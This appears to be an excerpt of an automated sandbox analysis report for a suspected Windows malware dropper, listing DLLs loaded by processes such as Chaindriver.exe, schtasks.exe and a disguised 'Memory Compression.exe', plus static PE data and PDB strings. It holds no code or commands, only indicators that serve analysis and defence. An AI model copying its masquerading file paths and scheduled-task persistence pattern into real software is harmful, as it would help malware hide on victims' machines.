                          Source: C:\Chaindriver.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: version.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                          Source: C:\Chaindriver.exeSection loaded: mscoree.dll
                          Source: C:\Chaindriver.exeSection loaded: kernel.appcore.dll
                          Source: C:\Chaindriver.exeSection loaded: version.dll
                          Source: C:\Chaindriver.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Chaindriver.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Chaindriver.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Chaindriver.exeSection loaded: uxtheme.dll
                          Source: C:\Chaindriver.exeSection loaded: windows.storage.dll
                          Source: C:\Chaindriver.exeSection loaded: wldp.dll
                          Source: C:\Chaindriver.exeSection loaded: profapi.dll
                          Source: C:\Chaindriver.exeSection loaded: cryptsp.dll
                          Source: C:\Chaindriver.exeSection loaded: rsaenh.dll
                          Source: C:\Chaindriver.exeSection loaded: cryptbase.dll
                          Source: C:\Chaindriver.exeSection loaded: sspicli.dll
                          Source: C:\Chaindriver.exeSection loaded: mscoree.dll
                          Source: C:\Chaindriver.exeSection loaded: kernel.appcore.dll
                          Source: C:\Chaindriver.exeSection loaded: version.dll
                          Source: C:\Chaindriver.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Chaindriver.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Chaindriver.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Chaindriver.exeSection loaded: uxtheme.dll
                          Source: C:\Chaindriver.exeSection loaded: windows.storage.dll
                          Source: C:\Chaindriver.exeSection loaded: wldp.dll
                          Source: C:\Chaindriver.exeSection loaded: profapi.dll
                          Source: C:\Chaindriver.exeSection loaded: cryptsp.dll
                          Source: C:\Chaindriver.exeSection loaded: rsaenh.dll
                          Source: C:\Chaindriver.exeSection loaded: cryptbase.dll
                          Source: C:\Chaindriver.exeSection loaded: sspicli.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: mscoree.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: apphelp.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: kernel.appcore.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: version.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: uxtheme.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: windows.storage.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: wldp.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: profapi.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: cryptsp.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: rsaenh.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: cryptbase.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: sspicli.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: mscoree.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: kernel.appcore.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: version.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: uxtheme.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: windows.storage.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: wldp.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: profapi.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: cryptsp.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: rsaenh.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: cryptbase.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: sspicli.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: ktmw32.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: rasapi32.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: rasman.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: rtutils.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: mswsock.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: winhttp.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: iphlpapi.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: dnsapi.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: winnsi.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: rasadhlp.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: fwpuclnt.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: propsys.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: apphelp.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: dlnashext.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: wpdshext.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: edputil.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: urlmon.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: iertutil.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: srvcli.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: netutils.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: wintypes.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: appresolver.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: bcp47langs.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: slc.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: userenv.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: sppc.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Recovery\Memory Compression.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: mscoree.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: apphelp.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: version.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: uxtheme.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: windows.storage.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: wldp.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: profapi.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: cryptsp.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: rsaenh.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: cryptbase.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: sspicli.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: mscoree.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: version.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: uxtheme.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: windows.storage.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: wldp.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: profapi.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: cryptsp.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: rsaenh.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: cryptbase.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: sspicli.dll
                          Source: C:\Chaindriver.exeSection loaded: mscoree.dll
                          Source: C:\Chaindriver.exeSection loaded: kernel.appcore.dll
                          Source: C:\Chaindriver.exeSection loaded: version.dll
                          Source: C:\Chaindriver.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Chaindriver.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Chaindriver.exeSection loaded: uxtheme.dll
                          Source: C:\Chaindriver.exeSection loaded: windows.storage.dll
                          Source: C:\Chaindriver.exeSection loaded: wldp.dll
                          Source: C:\Chaindriver.exeSection loaded: profapi.dll
                          Source: C:\Chaindriver.exeSection loaded: cryptsp.dll
                          Source: C:\Chaindriver.exeSection loaded: rsaenh.dll
                          Source: C:\Chaindriver.exeSection loaded: cryptbase.dll
                          Source: C:\Chaindriver.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: mscoree.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: version.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: uxtheme.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: windows.storage.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: wldp.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: profapi.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: cryptsp.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: rsaenh.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: cryptbase.dll
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeFile opened: C:\Users\user\Desktop\pyvenv.cfgJump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: t8F7Ic986c.exeStatic PE information: Image base 0x140000000 > 0x60000000
                          Source: t8F7Ic986c.exeStatic file information: File size 7204705 > 1048576
                          Source: t8F7Ic986c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: t8F7Ic986c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: t8F7Ic986c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: t8F7Ic986c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: t8F7Ic986c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: t8F7Ic986c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: t8F7Ic986c.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: t8F7Ic986c.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: C:\A\34\b\bin\amd64\select.pdb source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\python39.pdb source: t8F7Ic986c.exe, 00000001.00000002.1667701805.00007FFDFB989000.00000002.00000001.01000000.00000004.sdmp
                          Source: Binary string: C:\A\34\b\bin\amd64\_bz2.pdb source: t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdbMM source: t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
                          Source: Binary string: D:\a01\_work\26\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: t8F7Ic986c.exe, 00000000.00000003.1655768186.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
                          Source: Binary string: C:\A\6\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.0.dr
                          Source: Binary string: .pdbza, source: Memory Compression.exe, 00000025.00000002.1832528116.000000001B2EF000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\A\34\b\bin\amd64\_hashlib.pdb source: t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.0.dr
                          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.0.dr
                          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1k 25 Mar 2021built on: Tue Apr 6 11:26:02 2021 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_socket.pdb source: t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.0.dr
                          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.pdb source: Chaindriver.exe, 00000008.00000002.1728153566.000000000376F000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: BoosterX.exe, 00000004.00000000.1662947336.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp, BoosterX.exe, 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp, Chaindriver.sfx.exe, 00000007.00000000.1672760470.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp, Chaindriver.sfx.exe, 00000007.00000002.1686794737.00007FF720B78000.00000002.00000001.01000000.0000000C.sdmp, Chaindriver.sfx.exe.4.dr, BoosterX.exe.0.dr
                          Source: Binary string: C:\A\34\b\bin\amd64\_decimal.pdb## source: _decimal.pyd.0.dr
